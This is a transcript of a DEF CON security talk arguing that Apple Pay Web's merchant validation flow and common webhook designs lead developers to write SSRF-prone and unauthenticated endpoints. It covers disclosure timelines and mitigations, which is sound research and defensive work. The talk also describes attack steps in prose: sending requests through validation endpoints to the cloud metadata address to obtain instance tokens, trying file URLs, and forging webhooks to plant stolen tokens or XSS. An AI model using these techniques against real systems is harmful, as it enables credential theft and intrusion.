 So what about our next talk? How many people here have used Apple Pay? Yeah? So the first time I used Apple Pay was actually on an air compressor at a gas station. Who knew that that was going to be at the cutting edge of technology and mobile payments, huh? And I kept using it in person. I was like, oh, that's pretty cool. Then I knew that it was on the web and then I had the opportunity to order some coffee as you do off the internet, you know, cut out the middleman, ship direct to me. And I'm sitting there in bed and I was like, Apple Pay, never use this on the web. How does this work? Badoop. And it's like, it's done. Shipping information is preloaded. This is magic. Then I started being like, I would rather use Apple Pay than buy from Amazon. So much like all things that are magic, we come to DEF CON to have our hopes and dreams dashed. So, let's hear about how Apple Pay is severely broken, probably. Hopefully not compromising your credit card information. Let's go back to speaker a big round of applause. Thank you. All right. So I'm going to lay something on the table right now. This talk is about software architecture and I'm not apologizing for it. Now, you may be wondering, how in the world did this guy get in here? Software talks are boring. And I would kind of agree with you. I've been to a lot of them. I've been a software engineer myself. And they can be very boring. Architecture talks can be especially boring. But most of those are on the positive side. You build something, it scales, it makes the client a lot of money. So now you're an expert. But I'm going to go on the negative side. This is a hacker convention after all. Where does software architecture go horribly wrong? Obviously, when it scales, when it scatters vulnerabilities across the web. So first about me, a bit about me. I have a background in math. I've been a web developer for a while. Then I started with bug bounties and that shifted me a bit towards security. And now at PKC, I've been doing a lot of security work for clients. We're located in Huntington Beach about a four hour drive away from here. You can visit us at pkc.io. And now for an overview of the talk. First, I'll go over a couple of demos. Sorry. First, I'll go over a couple of terms. Combined to four, which will later combine to form my criticism of Apple Pay. Then I'll do some demos. The focus is on finding a large number of easy to exploit bugs. So the demos will be quick and prerecorded. These demos are all against my own redeployments of open source stuff that has already been fixed. I won't be attacking any live e-commerce systems since most of my disclosures to those are still private. Lastly, I'll have some general principles for designing better APIs. I'm going to go pretty hard here on an architectural decision made by Apple. In discussing the security of software architecture, people tend to bring up vague principles and notions of who's responsible for what. But I'm going to go back myself up with concrete examples. Better yet, these examples should be educational if you want to start testing SSRF yourself. The payloads are all pretty easy and a lot of them you can find on the web. So this should be a great expository place to start. So onto definitions. So there's this existing concept of a class break. It's the idea that software tends to be vulnerable in several places at once. Past research has focused on cases where you may have one single weak piece of code, say heart bleed or SQL injection and a CMS plugin. And then when that vulnerability gets found, there's this huge rush against your instance patched because it's broken in all these different places at once. You could frame a lot of the talks at this conference as class breaks. Currently, there's a lot of tooling to help companies stay on top of this. But there's another level that I've seen a lot of this year. It's not new, but it's becoming more common. A company will create an API or spec at this top level that isn't itself vulnerable, but in some way induces other people to write weak code. Some familiar examples of this might be the JWT-NUN algorithm or problems in SAML implementations. If you're looking for sheer volume of vulnerabilities, looking at this top level can be a great place to start. I couldn't find an existing general term for this top level, so I'm going to call it an inductive weakness. And here's the definition. It's a design flaw that encourages multiple parties to write vulnerable code with a similar exploit pattern across differing software stacks. For example, we might say that an API induces SRF vulnerabilities or that an API has an inductive SSRF weakness. This is wordy and might not seem entirely justified right now, but it should make more sense once we get onto the demos. And now for a refresher of the other term. SSRF. It's been around for a while and it stands for server side request forgery. A lot of people tend to confuse this with CSRF or client side request forgery, but in actuality, the way that you exploit these things are very, very different. So the naming similarity is kind of unfortunate. SSRF is a bit of a hot topic right now because it's a lot easier to exploit than it used to be. In the past, there have been some really, really interesting talks on SSRF. We'll get it, I'll reference those later, but it is a really interesting area. But for now, we have actually some really easy payloads we'll see towards the end of the section. So, say this attacker on the top left wants to get to an internal facing server on the bottom right. But the attacker doesn't have direct access. They can only go through this public facing server displayed in the middle. So, the attacker then tries to find some weakness in that public facing server. In the past, people have taken the URL and put it some more like a host header or in the body of some XML in order to get the server to hit the desired location. The goal is to really request through the server in the middle, as if or or a proxy, even though it's not trying to be. Typically, we only call it SSRF if the attacker can use a proxy-like behavior to access or harm something internal. Even if it's not true SSRF and you can only proxy through, sometimes it does make sense to report to companies, although then you probably wouldn't expect a bounty. And then, so if you can get back stuff back, it's easier to exploit and called transparent SSRF. Otherwise, it's called blind SSRF. So, what can you do with this pattern? Turns out, it's quite powerful right now because of the defaults in popular cloud environments. This has been the most fruitful SSRF approach for me so far. Google Cloud and AWS both expose credentials by default on 169.254.169.254. Depending on the permissions assigned to this instance, this token can often access private storage buckets or other stuff. This is the easy SSRF approach I've been talking about. So, there has been even some pretty credible speculation that the AWS equivalent of this endpoint was the first step that enabled the recent Capital One breach. But I never go that far. I just stop here and report it. But you can imagine that if you can find a lot of cases where you might be able to proxy through a server, some of those are going to be AWS or GCP boxes and a lot of those are going to have the default permissions. The other thing to note is that on this, on screen here you see a curl command. That in itself does not demonstrate an SSRF vulnerability because I'm already inside the box on this case. It's just demonstrative. It's when you can externally tell the server to hit that URL and give you back the token that it becomes SSRF. Also, to keep the naming straight, the slide is also not an inductive weakness. AWS and GCP aren't causing people to write weak code. They're just widening the consequences of people do. But what the slide does demonstrate is that if you want to do SSRF on someone using AWS or GCP right now, you have a very easy payload to start with. So, what are some easy things, other easy things to try with SSRF? People have already been criticizing AWS and Google Cloud a lot for providing the GUI center you saw in the previous slide. There's even been some speculation that, or some rumors that AWS is in the process of hardening this up in response to the recent Capital One breach. So I'm not going to dwell on this too much. File URLs are another interesting thing to try, especially on older sacs. You may be very familiar with these from CTFs and stuff like that. The other interesting thing to try is that if you can proxy through Git requests, you can do reflected XSS. You just have to point to a URL with some malicious HTML and JavaScript. Though then it's technically not SSRF because the tax scenario is different. However, if your goal is to collect a bug bounty, this is a great thing to keep in mind if you're hitting a dead end, trying to hit internal servers, because reflected XSS usually is considered within the scope of bug bounties. But what if you want to dig deeper? There's been a lot of past work on cross protocol attacks via SSRF. Go for URLs are interesting because you can inject a wide range of characters that will eventually go into the TCP stream. So you have a lot of room for interacting with other protocols like SMTP. There are a lot of different ways to get there though. Sometimes it might be necessary to set up a server that redirects the protocol you want. Other times you might just go with an HTTP URL and exploit a bug in the URL parser. Probably the coolest work on this is the Orange SciTalk, a new era of SSRF. However, libraries are getting stricter and there's a lot of easy stuff that has been fixed. This is a really fun area of research though and I expect there will be additional chains discovered in the future. And now we'll combine these two terms. Alright. But before diving in, it's important to note that Apple Pay is composed of three different technologies under one brand. You may be familiar with the buy with Apple Pay button, which appears on both in-app and Apple Pay web. There's also the upcoming Apple Pay card, but I have no idea where that fits into all of this. I am only criticizing Apple Pay web since it has some problematic requirements for merchants. So, say you have an online store within the nomenclature, we would call you a merchant. So, what does your website need to do to support Apple Pay web? When the user first clicks that buy with Apple Pay button, Safari generates a validation URL which is on one of about 30 Apple.com subdomains. It's really strange. Then in your client side JavaScript, you have to send the validation URL to your back end. Then your server needs to grab a merchant session from that validation URL and return it to the client. This is all a bit wordy though and it's much better as a diagram. Luckily, I already have one. So, this should look familiar. Following the typical flow as a merchant, your server there in the middle would take in that URL to know which Apple server to connect to and grab an merchant session. But depending on your infrastructure, if you implemented in the way Apple originally documented, this was a really dangerous functionality to add. The endpoint is ideal for an attacker who wants to do SSRF and especially transparent SSRF because the validation URL is user supplied. They're basically doing load balancing in the user's browser. I've asked Apple for some justification of this requirement and after several months I still have no idea why this is there. In the original WWDC talk, there's some vague mention of handling the case where a merchant is compromised. But that doesn't explain why they allow the client to choose between validation URLs instead of just having one. And ultimately they're providing a whole new way for attackers to compromise merchants. Google pays certainly doesn't do this. Some merchants were safe for one reason or another but we'll get to mitigations later. Right now it's time for a demo. Alright, so these demos are not going to be particularly deep attack chains but besides demonstrating breadth of attack surface, they should be illuminating if you are interested in testing SSRF yourself. Just please if you try this at home, only try it against sites where you have permission. And report what you find. Don't go snooping around private storage buckets. Alright, so the first demo is against a Google Chrome Labs project that was deployed publicly via App Engine but not in a production environment. I don't point this out to shame Google or the developer. Instead I want to demonstrate that even talented, qualified people working on modern stacks were affected by this design flaw in Apple Pay. Alright, we'll just go with that. Okay, so here's my own deployment of this project so we can see what I did against Google's deployment. As you can see it has a buy with Apple Pay button. It's getting an error because my deployment isn't fully configured but our attack will still work. If we click it we can see a request going out to an endpoint called Validate. It will pop up there in red. That's the endpoint I was talking about earlier. Normally you might attack this with something like Burp or MITM proxy but I'm going to go old school with just curl. So, first we can clean up some headers. Then we modify the validation URL so we can conveniently replay different values. First I'm going to try to hit example.com to see if we can hit proxy through the endpoint I'm hitting. It's going to take another try. So yeah, just proxying out to example.com. Again that's not SSRF but it is a useful first step in testing this stuff. Because now we're free to try different payloads because we know that we have that proxy like behavior. So, let's try to hit the instance metadata endpoint. And this is going to be, yep, oh, yeah. So this is promising. It looks like we're getting through it on a Google Cloud box. And then by feeding in meditated.google.internal we confirm that that's the case. And from here it's just a matter of browsing around directories and seeing what works. For whatever reason slash V1 beta one is less pick about headers and slash V1. I have no idea why. But we can keep browsing. And now we're in the directories of the Google center. We can see what permissions this box has access to. And even grab a token. This token is long expired by now but don't worry. Or for some reason I put a black box on part of it. And now on to the next demo. So for the next demo we'll be attacking my own deployment of a page that used to be on webcat.org because it's open source. The issue is fixed but I deployed the vulnerable version from a few months ago on wk.jmadx.com for the purposes of the demo. Don't worry though. This demo is offline by now. Importantly just like the previous demo, the code on webcat.org was written by a well qualified developer at a large tech company. This may even be more convincing because it demonstrates that even developers of Apple were not immune. In the original POCI sent Apple I just grabbed an AWS token. However, since I have this deployed on Google Cloud the approach will be a little bit different. So we'll get a chance to see a little bit different payload. So I love this art. But this button here looks promising too. Oops, that paused. So yeah, here you can see my own deployment of the code that used to be on webcat.org. Again I love the art that the button here looks also looks promising. It turns out we can see a merchant validation request happening here. If we click it again. It's going to go out to this tiny, tiny text there, merchantvalidation.php. It's different code. But because of the requirements imposed by Apple we can repeat the same attack. So we're going to go through the same approach. Change up the validation URL. Then clean up some headers. Coral will automatically append the content length header so we can just not worry about that. So let's go through the same process. We can try to hit instance metadata. But we won't have any luck because the request methods aren't lining up in our favor. But we can see, like, we can get traffic out and through example.com. So from here it's just a matter of trying out different payloads. But this is a classic PHP app. So just the classic file URLs will work. So this is a fairly deeply seated architectural problem. And I reported it to Apple back in February. But what has Apple done to mitigate this? So far just documentation changes. Importantly the documentation used to pretty much walk you through the process of adding a vulnerability to your website. Now the documentation has this little warning box. They seem really optimistic about how many developers actually read those. However, if you do happen across these warning boxes and read them carefully your the instructions are now valid. But there are existing clients, I can't imagine too many developers are constantly visiting the documentation to check what warnings were added. And here's the disclosure timeline. There's not much here. The main thing is that I reported this back to Apple back in February and haven't seen any meaningful architectural changes. In my original proposal I asked for Apple to deprecate the current API and phase in a new one that didn't have these problems. But they haven't engaged with me in any discussion on that. They've just updated documentation and removed their bad example code. We'll get back to this later. But for now, how would you mitigate this? My favorite mitigation so far has been to just remove support for Apple Pay entirely. This might not work for everyone though. For everyone else, it's important to manually parse the validation URL and check it against Apple's list. It's kind of ugly to copy and paste 30 domains into some config file. But that's pretty much what you have to do. A couple of payment providers actually do this out of the box though. So far I'm just aware of Stripe and Braintree. So if you're using one of those they're safe. You're safe. And they've actually been the main hurdle in collecting bug bounties. Even though I was able to collect some, a lot of modern companies use Stripe. Tend to use one of these two payment providers and given that, that's been a fairly big hurdle. But what if you want to defend more broadly against SSRF? For my experience, very few people are protecting e-gross traffic. But when they do, it's a pretty big speed bump. This may make more less sense depending on the size of your organization. And just how your network is laid out and just kind of what your risk, risk characteristics are with SSRF. But that may be an option to consider. Netflix also does some really great work in proactively dealing with the GUI center in AWS. In general though, it's good to take a look at what ports are open locally on your servers and add passwords even when the network layer is theoretically protecting them. So, on the other hand, here's some stuff I've seen that does not, that has some holes in it. And this is part of, part of what makes implementing support for Apple Pay so tricky is that there are a lot of, there are a lot of potential fixes that might work and might protect you from maybe the typical attacks that I've been feeding in but that you can kind of poke holes in. Rejects are tricky and I wouldn't recommend them as a mitigation for this issue at all. But besides the points in this slide, I would also discourage against relying on a check to start at apple.com even if you're not using weak rejects. Because then, if there's an open redirect anywhere on any apple.com subdomain, an attacker can use the open redirect to circumvent your check. Narrowing the check to specifically allow the 30 Apple Pay related subdomains is better. Unrelated, but if anyone knows of an open redirect on any apple.com subdomain, I would be glad to hear about it. But really, there's no way of getting around it. If you have to support Apple Pay Web, you really should go through Apple's updated documentation and read through the warnings they've added. The architecture is still bad, but at least the documentation doesn't walk you through the process of adding vulnerability. So, that wraps up the specifics on Apple Pay Web and our first inductive weakness. I'll have more to say on Apple towards the end of this talk, but in the next section, I'll move on to another pattern that can induce vulnerabilities. But for, let's see, yeah, I'll move on to another pattern that can induce vulnerabilities. So, web hooks are becoming a fairly common and useful way to tie the web together. We'll take a little bit of the heat off Apple now. There are a lot of web hooks out there right now, and nobody seems to agree on how they should be implemented. And there are a lot of different approaches people are trying. But what's a web hook? Here's an example from Twilio. It's a way of telling a service to call your URL as soon as an event happens. Here you can see jmadx.com slash SMS registered. So Twilio will send me an HTTPS request every time it has a new SMS message for me. But, how have people been exploiting web hooks so far? They've gone after the sender of the web hook. In this case, Twilio. It's pretty similar to how I would test Apple Pay. Instead of entering your own server as the URL, you put the AWS Instance metadata IP or try to do some cross protocol stuff. This is just a general challenge of implementing web hooks. It's not an inductive weakness because there's no central party inducing this pattern. There's no central party telling Twilio they have to have a web hook or that they have to have a web hook to enable this feature. It's just a really useful feature for Twilio to provide to their clients. But, luckily, lots of people have already explored web hooks in this way. And web hooks do tend to be implemented by larger companies with a lot more, a lot better footing in regards to security issues. So you can find a lot of bug bounty write ups where people did exactly this. And even getting payloads for some of the Apple Pay issues, like web hook SSRF write ups were really helpful. But what have I been doing with web hooks? I apply the same inductive weakness model that worked with Apple Pay. Instead of going after the sender, I look for an attack surface the sender might be inducing in the listeners. It turns out for Twilio, this approach works. How do the receivers of the web hooks know that the message is coming from Twilio? Twilio provides an HMAC, similarly to how most web hooks are done right now. Not to, yeah, I'm singling out Twilio a little bit, but a lot of web hooks do this right now. They call it a signature and that might make the cryptographers in the room cringe, but conceptually it does help to think of it as a signature. Assuming that receivers actually check it, it's not too bad. But when I took a look, most related open source projects failed to check the HMAC, so I had these unauthenticated end points lying around. And once I started poking around, it became apparent one reason why. Twilio's examples didn't check the HMAC either. Then setting aside the bad example code, there's also an architectural problem here. I argue that since the easiest way to receive an HMAC authenticated web hook is to disregard the HMAC. That's a design flaw. And I would also call it an inductive weakness. So now it's time for a demo. This demo is going to be slightly different. The example code wasn't on a public-facing server, so I didn't get any credentials from Twilio themselves and so therefore of course not a bounty. But it's still worth showing because it was copied and pasted elsewhere. So here's where I started, just looking around at the Twilio example code. On the read-me, there's now a warning to protect your roadbooks, but it turns out the example code still doesn't do that. Going even further, this example code takes an immediate URL parameter, which looks quite promising. And this is even quite generous in that this example code fetches the contents of that media URL and puts them in a public-facing directory. So you might be able to guess where this is going. In the next tab, I'll have this deployed on a Google Cloud instance. It tells us to send a text message, but we don't need to do that. This webhook is unauthenticated, so we can use the snippet I have on the right and pretend we're Twilio, sending over a CSV attachment. But because of the URL we sent, pointing to Google Cloud instance metadata, we can see the token is now stored in that public directory. And by the way, this token is also long expired. So here's the disclosure timeline, fairly similar to the Apple pay one. But you might be wondering, are Twilio's competitors doing any better or worse? Turns out, with Nexmo, it's worse. Not only does the architecture similar, but you have to contact support to even get them to send you an HMAC. And even if you do contact support, some of the webhooks don't even have that option. I don't have much to say about this. It's pretty much beyond hope, so let's move on to another webhook. So, GitLab. GitLab does something similar to Twilio, but with a static token instead of an HMAC. So the implementation is a bit different, but the same level of optimism is there. They expect that users of the webhook will register that token and then check that token when it's received. But here's the event that is sent by one of the webhooks if you enable it. So you can imagine what I did. I simply found a server that was receiving this webhooks. As usual, they were not validating that it was coming from GitLab. I won't name names, but it is a webhook. I can't imagine, given what we've seen so far, that what I found was the only unauthenticated one. But in any case, I decided to tweak the sample push event and send it over. Right off the bat, I was able to modify the repository URL and trigger extra builds for arbitrary repos. I didn't have any success deploying arbitrary code, but this did have one nasty consequence. It turned out I could store XSS payloads. The script would execute whenever someone clicked a particular button on their build pipeline page. And you don't need to log into anything to do this attack. This really epitomizes the point I want to make. So far, we've been asking what vulnerabilities are in the software, but an equally important question is, what vulnerabilities does the software create? Once you start asking this question, you can find a lot of easy stuff that you won't need particularly difficult payloads to exploit. So these next few slides are going to be a bit text heavy, but I'm making a really aggressive climb here that nearly everyone's doing webhooks wrong. So it's necessary to lay out some alternatives. I'll start with the coolest but least practical one. You can encrypt your outgoing webhooks with an authenticated cipher. The upside is that in the act of trying to use the information you give them, you send people, people will inevitably be authenticating it. But the downside is there aren't a lot of good libraries for encapsulating this. So it's not very practical right now. But we can dream. So going a little more practical, you can do it flat and square due. If you limit your webhook payload to just an event ID and expect the receiver of the webhook to fetch it, you're really not inducing much attack surface. The downside is that this does require an extra request from the listener to you. You do also have to worry about path injection, or path traversal if that ID is within a URL segment. Since a lot of developers, like probably most developers will forget to actually URL encode the value that they put into API call. But, I mean all things told this is probably a good middle ground. And the websites I've seen using this, I haven't really found any practical ways to exploit path traversal, even for people who aren't careful about it. But the least aggressive approach, which works well for existing webhooks, is just to be more proactive about making sure that people use the HMAC. Most webhooks already do one testing request to ensure that the URL is publicly available and live, just to make sure that they're not sending data somewhere where it's just going to be ignored. So it's not a huge change to do two requests instead. It's then a matter of policy to decide what you want to do if those requests have the same response code, indicating that they're unauthenticated. But even if you just warn people, once you get a webhook that it does appear unauthenticated, you're still miles ahead of what others are currently doing. I'd really like to see webhooks start doing this, since it's low risk and backwards compatible in a lot of cases. So a lot of this so far has been negative, and intentionally so. But there is an upside. By designing your API to be defensive from the ground up, you have a lot of the ability to prevent vulnerable code from being written. Let's take a look at one API that didn't and one that did. This should also be illuminating just to get an idea of which APIs, if you're looking at this from the attack side of things, which APIs might be promising in terms of finding induced vulnerabilities. So Salesforce and DynamoDB are very different products. But they have an interesting area where they overlap. They both have had to act as a source of truth with some complicated business requirements piled on to the point they had to each implement a custom SQL like dialect. But they went about that in very different ways. If you've ever contested a web app that uses Salesforce, hopefully this has been on your radar. I've gotten a lot of mileage out of it. Sometimes user input propagates out to a place where you can inject into this API call, much like you would do with SQL. So how does Salesforce try to mitigate this? More documentation. This is becoming a theme. At first, this might seem inevitable given what Salesforce is trying to do. Given what Salesforce is required to do. But when Amazon tackled this, they did something interesting. DynamoDB forces you to parametrize your condition expressions. If you try to concatenate a raw type in there, it will be treated as a syntax error. You have to put it into this expression attribute values object. There are other ways you can go about attacking these calls. But they're a lot more limited and more complicated than if you can just inject into the syntax itself like you could do with full SQL syntax. This is, this, the way that Amazon does this is kind of cumbersome and you can see that there are just a lot of fields on screen here. But I think it's a good trade off given the strength of protection this provides. So, so let's get back to Apple. Since they're probably the worst offender in this talk. After two months of silence, they came back with this as justification for their architecture. Developers are responsible for implementing whatever security and networking best practices make the most sense for their environment. This is true, sort of. I mean, and you're looking at it, this, developers do have a lot of responsibility over their apps. But the implication here is that Apple has no culpability in this. Luckily, I've got another great quote. If you've built a chaos factory, you can't dodge responsibility for the chaos. And you may be able to, thank you. So, but both of these statements are right. Um, I'm not just here to point out hypocrisy. Developers are responsible for implementing, uh, for not introducing vulnerabilities into their code base. But if you expect people to add an end point somewhere, you do have a level of responsibility for the attack surface that you're creating. So, but that's a purely ethical argument. Let's look at some of the financial aspects of inductive weaknesses. Once researchers start hunting for this stuff, and I encourage you to, especially just if you go about it within ethical, the ethical way. Um, but I expect a lot of people to start hunting, uh, yeah. I imagine there will be a large financial incentive for API designers to start thinking about it. Not just from the perspective of having to pay out bounties, um, but from other perspectives. I got some nice bounties out of this Apple Pay issue. And none of my work needed very difficult payloads. And none of those bounties were from Apple. Uh, so I think it's fair to think that, you know, once this talk is over, that some people are going to start applying my approach. Also, think of where these people are going to report this stuff, and where I've been reporting this stuff. You're seeing the most embarrassing consequence here. But what if my talk hadn't been reported, accepted to any conferences? There was a lot of private embarrassment as well. Apple doesn't think that was much of an issue. But most of the websites are reported to did. They're like, yeah, we have this SSRF thing lying around like, I mean in some cases, just let's remove it. But, and so I wouldn't be surprised if they held that against Apple. For another angle, there's, in software development, there's this concept of technical debt. It's the idea that cutting corners early on has cost that accumulates as a project grows. With regular tech debt, the fixes reside in your own code base. So the interest rate and the cost fix is tied to the growth of your own code base. But with inductive weaknesses, the fixes are in your clients code. So the interest rate is tied to how much adoption your API sees. At a certain point, if you want to pay down the debt, you can't just push out an update to your own code like you would do with, you know, a library or something like that. You have to push out a breaking change and contact your customers and tell them that you had, that they have a vulnerability because they chose you. So here's really what I'm asking for from API designers. And it should be pretty cheap if you want, if you start thinking about this stuff early. I'd really like to see people, oh, yeah, I'd really like to see people start scrutinizing their example code because it gets deployed a lot more often than you'd think. In the process of scrutinizing your example code, you may even discover inductive weaknesses. If Apple had done so, I certainly wouldn't have much to talk about. And, you know, beyond auditing your own example code, if you're a researcher, like auditing other people's example code is a great place to start. Because again, it gets deployed a lot and sometimes places where it gets deployed are stuff that people care about. But also, keep in mind that a lot of developers don't realize quite how dangerous it is to an externally provided URL. But if there's one thing I want people to take away from this talk, it's that documentation is no excuse for bad architecture. And here are the acknowledgments. I'd like to thank Jonathan at PKC for asking some initial questions. Arte at PKC for pointing me to the next most stuff. Ken at PKC for helping with the presentation. And Andrew at the EFF for legal assistance. So, any questions? In the front here. That is an interesting approach. I haven't given that any thought. Oh, sorry. I'll repeat the question first. So, the question was on whether or not mutually authenticated TLS might be a better approach to authenticating web books. I've actually never seen that, but that might be interesting. I'm not sure how defensive it could be, but any more questions. Oh, I see one right here. What I consider, sorry. Let's see. So, where are some areas where I've seen WAFS come into play here? Sometimes I've kind of wished that WAFS would like just detect whenever I'm doing something suspicious with the validation URL. But obviously like this stuff wasn't public until you know just yesterday. So, I mean obviously in the future that would be really great for the Apple Pay issue specifically. Any more? Well thank you.